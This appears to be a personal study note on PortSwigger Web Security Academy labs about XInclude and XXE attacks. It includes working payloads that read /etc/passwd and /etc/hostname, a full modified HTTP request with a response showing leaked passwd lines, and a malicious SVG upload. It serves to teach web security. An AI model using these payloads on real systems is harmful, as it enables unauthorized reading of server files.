XInclude Attacks

When client-submitted data is placed into a back-end SOAP request, you cannot carry out a classic XXE attack, because you donā€™t control the entire XML document and so cannot define or modify aĀ DOCTYPEĀ element.

However, you might be able to useĀ XIncludeĀ instead.Ā XIncludeĀ is a part of the XML specification that allows an XML document to be built from sub-documents.

To perform anĀ XIncludeĀ attack, you need to reference theĀ XIncludeĀ namespace and provide the path to the file that you wish to include. For example:

<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>

Lab: Exploiting XInclude to Retrieve Files

The original request:

POST /product/stock HTTP/2
Host: 0ac40010040c90418252100b00ae0075.web-security-academy.net
Cookie: session=Md8A8x5RjU8P4I0XuQ4O9BCWf2D9IS05
Content-Length: 132
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Origin: https://0ac40010040c90418252100b00ae0075.web-security-academy.net
Referer: https://0ac40010040c90418252100b00ae0075.web-security-academy.net/product?productId=1
 
productId=1&storeId=1

Change request body into this:

POST /product/stock HTTP/2
Host: 0ac40010040c90418252100b00ae0075.web-security-academy.net
Cookie: session=Md8A8x5RjU8P4I0XuQ4O9BCWf2D9IS05
Content-Length: 132
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Origin: https://0ac40010040c90418252100b00ae0075.web-security-academy.net
Referer: https://0ac40010040c90418252100b00ae0075.web-security-academy.net/product?productId=1
 
productId=
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>
&storeId=1

Response has the content of /etc/passwd as expected:

HTTP/2 400 Bad Request
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 2341
 
"Invalid product ID: 
 
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

XXE Attacks via File Upload

Some applications allow users to upload files which are then processed server-side. Some common file formats use XML or contain XML subcomponents.

Even if the application expects to receive a format like PNG or JPEG, the image processing library that is being used might support SVG images. Since the SVG format uses XML, an attacker can submit a malicious SVG image and so reach hidden attack surface for XXE vulnerabilities.

Lab: Exploiting XXE via Image File Upload

Use the following payload from An SVG ā€œimageā€ that uses an XXE attack to embed the hostname file of whichever system processes it into the image itself (github.com):

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<text font-size="16" x="0" y="16">&xxe;</text></svg> 

Content of /etc/hostname will be displayed as an image.

XXE Attacks via Modified Content Type

Most POST requests use a default content type that is generated by HTML forms, such asĀ application/x-www-form-urlencoded. Some web sites expect to receive requests in this format but will tolerate other content types, including XML.

For example, if a normal request contains the following:

POST /action HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
 
foo=bar

Then you might be able submit the following request, with the same result:

POST /action HTTP/1.0
Content-Type: text/xml
Content-Length: 52
 
<?xml version="1.0" encoding="UTF-8"?><foo>bar</foo>
list
from outgoing([[Port Swigger -]])
sort file.ctime asc

Resources